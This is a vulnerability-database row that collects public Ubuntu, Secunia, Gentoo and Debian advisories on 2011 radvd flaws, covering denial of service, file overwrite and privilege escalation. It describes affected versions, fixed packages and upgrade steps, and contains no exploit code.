v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE----- |
| var-201402-0027 | The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE----- |